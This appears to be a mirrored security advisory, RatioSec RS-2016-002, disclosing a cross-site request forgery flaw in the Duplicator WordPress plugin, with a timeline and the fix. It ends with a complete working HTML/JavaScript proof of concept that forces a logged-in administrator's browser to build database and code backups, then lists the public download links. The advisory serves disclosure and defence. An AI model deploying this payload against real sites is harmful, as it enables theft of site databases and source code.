Vulners
Lucene search
WordPress Duplicator 1.1.0 / 1.2.0 Cross Site Request Forgery
🗓️ 12 Feb 2016 00:00:00Reported by RatioSec ResearchType 
packetstorm🔗 packetstormsecurity.com👁 20 Views
`-----------------------------------------------------------------------------------------------
RatioSec Research Security Advisory RS-2016-002
-----------------------------------------------------------------------------------------------
Duplicator Wordpress Plugin Code And Database Dump Via CSRF Vulnerability
-----------------------------------------------------------------------------------------------
Product: Duplicator WordPress Plugin
Vendor: Life In The Grid
Tested Versions: 1.1.0, 1.2.0
Other Vulnerable Versions: Prior versions may also be affected
Vendor Notification: 29th January, 2016
Advisory Publication: 9th February, 2016
CVE Reference: Pending
RatioSec Advisory Reference: RS-2016-002
Risk Level: High
CVSSv3 Base Score: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N
-----------------------------------------------------------------------------------------------
RatioSec Research has discovered a cross-site request forgery
vulnerability in Duplicator WordPress Plugin which can be exploited to
generate and disclose the WordPress database and code backups.
The application allows users to perform certain actions via HTTP
requests without performing proper checks to verify the requests
validity. An authenticated user's browser can be forced to generate
and disclose the WordPress database and code backups via the
vulnerable backup function by tricking the user into visiting a
malicious web site.
-----------------------------------------------------------------------------------------------
Proof of Concept
The proof of concept HTML page, if visited by a logged-in
administrative user, raises two requests
(`/wp-admin/admin.php?page=duplicator&tab=new2` and
`/wp-admin/admin-ajax.php?action=duplicator_package_build`) forcing
the creation of the WordPress source code, database, and install
scripts backup in the paths
`/wp-snapshots/ratiosec_ratiosec_archive.zip`,
`/wp-snapshots/ratiosec_ratiosec_database.sql`, and
`/wp-snapshots/ratiosec_ratiosec_installer.php`. Once generated, the
backup archives can be downloaded by the attacker with no
authentication.
See the proof of concept code on the RatioSec Research website.
http://www.ratiosec.com/2016/duplicator-wordpress-plugin-source-database-disclosure-via-csrf/
-----------------------------------------------------------------------------------------------
Solution
Update to version 1.1.4.
-----------------------------------------------------------------------------------------------
Timeline
- First contact: 29th January, 2016
- Disclosure: 29th January, 2016. Preliminary date set to 19th, February 2016.
- Postponed: Date pushed back to 19th February, 2016
- Fixed in GIT: 6th February, 2016
- Fixed Release: 9th February, 2016
- Advisory Publication: 9th February, 2016
-----------------------------------------------------------------------------------------------
Advisory URL
http://www.ratiosec.com/2016/duplicator-wordpress-plugin-source-database-disclosure-via-csrf/
RatioSec Research
Mail: research at ratiosec dot com
Web: http://www.ratiosec.com/
Twitter: https://twitter.com/ratio_sec
==============
POC:
<html>
<body>
<script>
wordpress_root = "http://localhost/wordpress";
function submitRequest1()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", wordpress_root + "/wp-admin/admin.php?page=duplicator&tab=new2", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.withCredentials = true;
var body = "action=&package-hash=ratiosec&package-name=ratiosec&package-notes=&archive-format=ZIP&filter-dirs=&filter-exts=&dbhost=&dbport=&dbname=&dbuser=&url-new=";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
function submitRequest2()
{
var xhr = new XMLHttpRequest();
xhr.open("GET", wordpress_root + "/wp-admin/admin-ajax.php?action=duplicator_package_build", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
xhr.withCredentials = true;
var body = "";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
function printLinks()
{
var dumps = ["ratiosec_ratiosec_archive.zip", "ratiosec_ratiosec_database.sql", "ratiosec_ratiosec_installer.php"];
for(var a in dumps) {
var url = wordpress_root + '/wp-snapshots/' + dumps[a];
document.body.innerHTML += '<br/><a href="' + url + '">' + url + '</a>';
};
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest1();setTimeout(submitRequest2,2000);setTimeout(printLinks,2500);" />
</form>
<p>Submit the CSRF request and wait few seconds to see below the public links of the dumps.</p>
</body>
</html>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Feb 2016 00:00Current
0.1Low risk
Vulners AI Score0.1